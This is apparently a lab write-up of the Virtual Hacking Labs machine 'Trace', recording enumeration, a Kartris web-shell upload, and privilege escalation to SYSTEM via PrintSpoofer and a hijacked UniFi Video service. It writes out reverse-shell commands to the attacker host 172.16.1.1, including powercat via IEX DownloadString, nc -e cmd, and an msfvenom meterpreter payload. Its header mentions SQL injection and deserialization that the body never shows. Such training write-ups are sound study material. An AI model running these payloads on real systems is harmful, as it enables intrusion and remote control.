WriteupsVHL — Trace
WebMediumWindows
VHL — Trace
IIS 10.0 running Kartris eCommerce on Windows. SQL injection and .NET deserialization chain leads to code execution and privilege escalation.
February 15, 2025Virtual Hacking Labs
#IIS#Kartris#SQLi#Deserialization
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.235
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-robots.txt: 17 disallowed entries (15 shown)
| /Admin/*.* /Protected/*.* /Uploads/*.* /Checkout.aspx
| /CheckoutComplete.aspx /CheckoutProcess.aspx /Callback.aspx /Error.aspx
| /Customer.aspx /CustomerAccount.aspx /CustomerAffiliates.aspx
| /CustomerDetails.aspx /CustomerInvoice.aspx /CustomerTickets.aspx
|_/CustomerViewOrder.aspx
| http-title: Kartris
|_Requested resource was /Default.aspx
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
1935/tcp open rtmp?
6666/tcp open irc?
|_irc-info: Unable to open connection
7080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-title: UniFi Video
|_http-server-header: Apache-Coyote/1.1
7443/tcp open ssl/http Apache Tomcat/Coyote JSP engine 1.1
| ssl-cert: Subject: commonName=10.11.1.235/organizationName=ubnt.com/stateOrProvinceName=CA/countryName=US
| Not valid before: 2018-05-01T08:01:53
|_Not valid after: 2028-04-28T08:01:53
|_http-title: UniFi Video
|_ssl-date: 2025-02-14T04:20:08+00:00; 0s from scanner time.
|_http-server-header: Apache-Coyote/1.1
7445/tcp open unknown
| fingerprint-strings:
| FourOhFourRequest, GetRequest:
| HTTP/1.0 404 Not found
| Server: EvoStream Media Server (www.evostream.com)
| Content-Type: application/octet-stream
| Access-Control-Allow-Origin: *
|_ Content-Length: 0
7446/tcp open ssl/unknown
| ssl-cert: Subject: commonName=10.11.1.235/organizationName=ubnt.com/stateOrProvinceName=CA/countryName=US
| Not valid before: 2018-05-01T08:01:53
|_Not valid after: 2028-04-28T08:01:53
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
| GetRequest:
| HTTP/1.0 404 Not found
| Server: EvoStream Media Server (www.evostream.com)
| Content-Type: application/octet-stream
| Access-Control-Allow-Origin: *
|_ Content-Length: 0
7447/tcp open unknown
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port7445-TCP:V=7.94SVN%I=7%D=2/13%Time=67AEC3C0%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,A9,"HTTP/1\.0\x20404\x20Not\x20found\r\nServer:\x20EvoStrea
SF:m\x20Media\x20Server\x20\(www\.evostream\.com\)\r\nContent-Type:\x20app
SF:lication/octet-stream\r\nAccess-Control-Allow-Origin:\x20\*\r\nContent-
SF:Length:\x200\r\n\r\n")%r(FourOhFourRequest,A9,"HTTP/1\.0\x20404\x20Not\
SF:x20found\r\nServer:\x20EvoStream\x20Media\x20Server\x20\(www\.evostream
SF:\.com\)\r\nContent-Type:\x20application/octet-stream\r\nAccess-Control-
SF:Allow-Origin:\x20\*\r\nContent-Length:\x200\r\n\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port7446-TCP:V=7.94SVN%T=SSL%I=7%D=2/13%Time=67AEC3D3%P=x86_64-pc-linux
SF:-gnu%r(GetRequest,A9,"HTTP/1\.0\x20404\x20Not\x20found\r\nServer:\x20Ev
SF:oStream\x20Media\x20Server\x20\(www\.evostream\.com\)\r\nContent-Type:\
SF:x20application/octet-stream\r\nAccess-Control-Allow-Origin:\x20\*\r\nCo
SF:ntent-Length:\x200\r\n\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|2019 (89%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3
Aggressive OS guesses: Microsoft Windows XP SP3 (89%), Microsoft Windows Server 2019 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE
HOP RTT ADDRESS
1 18.49 ms 10.11.1.235
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 281.64 seconds80
sh
80/tcp open http Microsoft IIS httpd 10.0
| http-robots.txt: 17 disallowed entries (15 shown)
| /Admin/*.* /Protected/*.* /Uploads/*.* /Checkout.aspx
| /CheckoutComplete.aspx /CheckoutProcess.aspx /Callback.aspx /Error.aspx
| /Customer.aspx /CustomerAccount.aspx /CustomerAffiliates.aspx
| /CustomerDetails.aspx /CustomerInvoice.aspx /CustomerTickets.aspx
|_/CustomerViewOrder.aspx
| http-title: Kartris
|_Requested resource was /Default.aspx
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACEdirectory search
sh
dirsearch -u http://10.11.1.235/
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/sake/vhl/Trace/reports/http_10.11.1.235/__25-02-14_00-01-28.txt
Target: http://10.11.1.235/
[00:01:28] Starting:
[00:01:28] 403 - 312B - /%2e%2e//google.com
[00:01:28] 200 - 1KB - /%3f/
[00:01:29] 403 - 312B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[00:01:29] 404 - 1KB - /.asmx
[00:01:29] 404 - 1KB - /.ashx
[00:01:33] 302 - 139B - /;/admin -> /;/Admin/_Default.aspx
[00:01:33] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[00:01:35] 302 - 137B - /ADMIN -> /Admin/_Default.aspx
[00:01:35] 404 - 1KB - /admin%20/
[00:01:35] 302 - 137B - /Admin -> /Admin/_Default.aspx
[00:01:35] 302 - 137B - /admin -> /Admin/_Default.aspx
[00:01:35] 500 - 2KB - /admin.
[00:01:35] 302 - 137B - /Admin/ -> /Admin/_Default.aspx
[00:01:35] 302 - 137B - /admin/ -> /Admin/_Default.aspx
[00:01:35] 302 - 157B - /admin/admin -> /Admin/_Default.aspx/Admin/_Default.aspx
[00:01:36] 302 - 162B - /admin_area/admin -> /Admin/_Default.aspx_area/Admin/_Default.aspx
[00:01:39] 302 - 151B - /administrator/admin/ -> /administrator/Admin/_Default.aspx
[00:01:41] 302 - 145B - /article/admin -> /article/Admin/_Default.aspx
[00:01:41] 500 - 2KB - /asset..
[00:01:41] 302 - 142B - /auth/admin -> /auth/Admin/_Default.aspx
[00:01:42] 302 - 146B - /bb-admin/admin -> /bb-admin/Admin/_Default.aspx
[00:01:43] 403 - 312B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[00:01:45] 302 - 148B - /confluence/admin -> /confluence/Admin/_Default.aspx
[00:01:45] 200 - 40KB - /contact.aspx
[00:01:46] 200 - 49KB - /default.aspx
[00:01:46] 200 - 1KB - /docpicker/internal_proxy/https/127.0.0.1:9043/ibm/console
[00:01:47] 302 - 140B - /en/admin/ -> /en/Admin/_Default.aspx
[00:01:47] 200 - 1KB - /error.aspx
[00:01:48] 200 - 31KB - /favicon.ico
[00:01:49] 302 - 143B - /forum/admin/ -> /forum/Admin/_Default.aspx
[00:01:50] 302 - 140B - /gs/admin -> /gs/Admin/_Default.aspx
[00:01:50] 301 - 149B - /images -> http://10.11.1.235/images/
[00:01:50] 200 - 25KB - /image.aspx
[00:01:51] 500 - 2KB - /index.php.
[00:01:51] 200 - 1KB - /index.php::$DATA
[00:01:51] 301 - 153B - /javascript -> http://10.11.1.235/javascript/
[00:01:52] 500 - 2KB - /javax.faces.resource.../
[00:01:52] 500 - 2KB - /javax.faces.resource.../WEB-INF/web.xml.jsf
[00:01:52] 200 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
[00:01:52] 200 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd
[00:01:52] 200 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo
[00:01:52] 200 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned
[00:01:52] 200 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable
[00:01:52] 200 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*
[00:01:52] 200 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties
[00:01:52] 200 - 1KB - /jolokia/exec/java.lang:type=Memory/gc
[00:01:52] 200 - 1KB - /jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used
[00:01:52] 200 - 1KB - /jolokia/write/java.lang:type=Memory/Verbose/true
[00:01:52] 200 - 1KB - /jolokia/read/java.lang:type=*/HeapMemoryUsage
[00:01:52] 200 - 1KB - /jolokia/search/*:j2eeType=J2EEServer,*
[00:01:53] 302 - 143B - /login/admin/ -> /login/Admin/_Default.aspx
[00:01:53] 404 - 1KB - /login.wdm%20
[00:01:53] 500 - 2KB - /login.wdm%2e
[00:01:55] 302 - 147B - /moderator/admin -> /moderator/Admin/_Default.aspx
[00:01:55] 302 - 145B - /modules/admin/ -> /modules/Admin/_Default.aspx
[00:01:55] 302 - 143B - /mysql/admin/ -> /mysql/Admin/_Default.aspx
[00:01:56] 200 - 30KB - /news.aspx
[00:01:57] 302 - 143B - /pages/admin/ -> /pages/Admin/_Default.aspx
[00:01:59] 301 - 150B - /plugins -> http://10.11.1.235/plugins/
[00:02:05] 500 - 2KB - /rating_over.
[00:02:06] 200 - 511B - /robots.txt
[00:02:06] 200 - 1KB - /rss.aspx
[00:02:07] 200 - 34KB - /search.aspx
[00:02:07] 404 - 1KB - /service.asmx
[00:02:08] 200 - 13KB - /sitemap.xml
[00:02:09] 301 - 148B - /skins -> http://10.11.1.235/skins/
[00:02:09] 302 - 148B - /SiteServer/Admin -> /siteserver/Admin/_Default.aspx
[00:02:09] 302 - 142B - /solr/admin/ -> /solr/Admin/_Default.aspx
[00:02:09] 500 - 2KB - /static..
[00:02:12] 200 - 11KB - /Trace.axd
[00:02:12] 200 - 1KB - /Trace.axd::$DATA
[00:02:12] 404 - 1KB - /umbraco/webservices/codeEditorSave.asmx
[00:02:12] 301 - 150B - /uploads -> http://10.11.1.235/uploads/
[00:02:13] 302 - 142B - /user/admin -> /user/Admin/_Default.aspx
[00:02:13] 302 - 143B - /users/admin -> /users/Admin/_Default.aspx
[00:02:14] 500 - 2KB - /WEB-INF./
[00:02:14] 500 - 2KB - /WEB-INF./web.xml
[00:02:14] 200 - 1KB - /web.config::$DATA
[00:02:15] 404 - 1KB - /WebResource.axd?d=LER8t9aS
[00:02:15] 200 - 34KB - /wishlist.aspx
[00:02:16] 200 - 34KB - /Wishlist.aspx/Trace.axd
creds
Admin:csxLX?dx
Admin portal
Kartris 1.6 - Arbitrary File Upload
- https://www.exploit-db.com/exploits/48445
sh
cp /usr/share/webshells/aspx/cmdasp.aspx ./
http://10.11.1.235/uploads/General/cmdasp.aspx
powercat reverse shell
- serve powercat
sh
python3 -m http.server- catch the reverse shell
sh
nc -lnvp 443sh
powershell.exe IEX (New-Object System.Net.Webclient).DownloadString('http://172.16.1.1/powercat.ps1');powercat -c 172.16.1.1 -p 443 -e cmdpriv escalation
cmd
c:\windows\system32\inetsrv>systeminfo
systeminfo
Host Name: DESKTOP-7VGT3QE
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.16299 N/A Build 16299
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00329-10021-83732-AA303
Original Install Date: 4/30/2018, 3:44:07 PM
System Boot Time: 2/13/2025, 9:40:35 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2195 Mhz
[02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2195 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 3,071 MB
Available Physical Memory: 1,583 MB
Virtual Memory: Max Size: 4,351 MB
Virtual Memory: Available: 1,991 MB
Virtual Memory: In Use: 2,360 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 2 Hotfix(s) Installed.
[01]: KB4053577
[02]: KB4054517
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.11.1.235
[02]: fe80::9cb2:f835:8f7e:bb49
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
whoami
cmd
c:\windows\system32\inetsrv>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
winpeas
cmd
C:\Users\Public>certutil.exe -f -urlcache -split http://172.16.1.1/winPEASx64.exe winPEASx64.execmd
� Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#services
UniFiVideoService(Ubiquiti Networks, Inc. - Ubiquiti UniFi Video)[C:\ProgramData\unifi-video\avService.exe //RS//UniFiVideoService] - Auto - Running - No quotes and Space detected
Possible DLL Hijacking in binary folder: C:\ProgramData\unifi-video (Users [WriteData/CreateFiles])
Ubiquiti UniFi Video Service
=================================================================================================sharpup
cmd
C:\Users\Public>certutil.exe -f -urlcache -split http://172.16.1.1/SharpUp.exe SharpUp.execmd
C:\Users\Public>.\SharpUp.exe audit
.\SharpUp.exe audit
=== SharpUp: Running Privilege Escalation Checks ===
[!] Modifialbe scheduled tasks were not evaluated due to permissions.
=== Abusable Token Privileges ===
SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
=== Modifiable Service Binaries ===
Service 'UniFiVideoService' (State: Running, StartMode: Auto) : C:\ProgramData\unifi-video\avService.exe //RS//UniFiVideoService
[*] Completed Privesc Checks in 1 secondsSeImpersonatePrivilege
cmd
C:\Users\Public>certutil.exe -f -urlcache -split http://172.16.1.1/GodPotato-NET4.exe GodPotato-NET4.execmd
C:\Users\Public>certutil.exe -f -urlcache -split http://172.16.1.1/PrintSpoofer64.exe PrintSpoofer64.execmd
C:\Users\Public>certutil.exe -f -urlcache -split http://172.16.1.1/nc.exe nc.execmd
.\PrintSpoofer64.exe -c "c:\users\public\nc.exe 172.16.1.1 80 -e cmd"PrintSpoofer
cmd
C:\Users\Public>.\PrintSpoofer64.exe -c "c:\users\public\nc.exe 172.16.1.1 80 -e cmd"
.\PrintSpoofer64.exe -c "c:\users\public\nc.exe 172.16.1.1 80 -e cmd"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OKcmd
nc -lnvp 80
retrying local 0.0.0.0:80 : Address already in use
listening on [any] 80 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.235] 50218
Microsoft Windows [Version 10.0.16299.125]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>type C:\users\administrator\desktop\key.txt
type C:\users\administrator\desktop\key.txt
onc5fjjdac2jdpwnpp1r
C:\Windows\system32>date
date
The current date is: Thu 02/13/2025
Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation
cmd
C:\ProgramData\unifi-video>icacls .\
icacls .\
.\ NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)sh
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.1.1 LPORT=80 -f exe > taskkill.exe- transfer the payload
sh
python3 -m http.server 8000cmd
C:\Users\Public>certutil.exe -f -urlcache -split http://172.16.1.1:8000/taskkill.exe taskkill.execmd
C:\ProgramData\unifi-video>dir
dir
Volume in drive C has no label.
Volume Serial Number is 46AC-CBC0
Directory of C:\ProgramData\unifi-video
02/13/2025 10:37 PM <DIR> .
02/13/2025 10:37 PM <DIR> ..
07/26/2017 02:10 PM 219,136 avService.exe
05/01/2018 12:00 AM <DIR> bin
05/01/2018 12:01 AM <DIR> conf
05/01/2018 12:02 AM <DIR> data
05/01/2018 12:00 AM <DIR> email
05/01/2018 12:00 AM <DIR> fw
05/01/2018 02:06 AM 35,190 hs_err_pid2128.log
05/01/2018 12:00 AM <DIR> lib
02/13/2025 08:40 PM <DIR> logs
02/13/2025 10:37 PM 7,168 taskkill.exe
05/01/2018 12:00 AM 768 Ubiquiti UniFi Video.lnk
07/26/2017 02:10 PM 48,640 UniFiVideo.exe
07/26/2017 02:10 PM 32,038 UniFiVideo.ico
05/01/2018 12:00 AM 89,050 Uninstall.exe
05/01/2018 12:01 AM <DIR> webapps
05/01/2018 12:01 AM <DIR> work
7 File(s) 431,990 bytes
11 Dir(s) 10,402,410,496 bytes freecmd
C:\ProgramData\unifi-video>sc qc UniFiVideoService
sc qc UniFiVideoService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: UniFiVideoService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\ProgramData\unifi-video\avService.exe //RS//UniFiVideoService
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Ubiquiti UniFi Video
DEPENDENCIES : Tcpip
: Afd
SERVICE_START_NAME : LocalSystem
cmd
C:\ProgramData\unifi-video>sc stop UniFiVideoService
sc stop UniFiVideoService
[SC] OpenService FAILED 5:
Access is denied.sh
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 172.16.1.1
msf6 exploit(multi/handler) > set lport 80
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcpcmd
C:\ProgramData\unifi-video>shutdown /r /t 0sh
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://172.16.1.1:80
[!] https://172.16.1.1:80 handling request from 10.11.1.235; (UUID: mbudcnlu) Without a database connected that payload UUID tracking will not work!
[*] https://172.16.1.1:80 handling request from 10.11.1.235; (UUID: mbudcnlu) Staging x64 payload (204892 bytes) ...
[!] https://172.16.1.1:80 handling request from 10.11.1.235; (UUID: mbudcnlu) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 2 opened (172.16.1.1:80 -> 10.11.1.235:49700) at 2025-02-14 01:51:46 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEMsh
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://172.16.1.1:80
[!] https://172.16.1.1:80 handling request from 10.11.1.235; (UUID: mbudcnlu) Without a database connected that payload UUID tracking will not work!
[*] https://172.16.1.1:80 handling request from 10.11.1.235; (UUID: mbudcnlu) Staging x64 payload (204892 bytes) ...
[!] https://172.16.1.1:80 handling request from 10.11.1.235; (UUID: mbudcnlu) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 2 opened (172.16.1.1:80 -> 10.11.1.235:49700) at 2025-02-14 01:51:46 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 1988 created.
Channel 1 created.
Microsoft Windows [Version 10.0.16299.125]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\ProgramData\unifi-video>whoami
whoami
nt authority\system
C:\ProgramData\unifi-video>type C:\users\administrators\desktop\key.txt
type C:\users\administrators\desktop\key.txt
The system cannot find the path specified.
C:\ProgramData\unifi-video>type C:\users\administrator\desktop\key.txt
type C:\users\administrator\desktop\key.txt
onc5fjjdac2jdpwnpp1r
C:\ProgramData\unifi-video>date
date
The current date is: Thu 02/13/2025
Up next
EasyFeb 2025
HTB — Titanic
Flask app path traversal via download endpoint reads arbitrary files including admin credentials. Magick ImageMagick CVE-2024-41817 for root shell.
Read writeup
EasyFeb 2025
VHL — Core
Legacy Ubuntu server with Apache 2.2 and Dovecot POP3. Enumerated mail service for credentials enabling SSH access to root.
Read writeup
MediumFeb 2025
VHL — FW01
IPFire firewall appliance with DNSmasq on port 53. Default/weak credentials on the admin panel lead to command execution.
Read writeup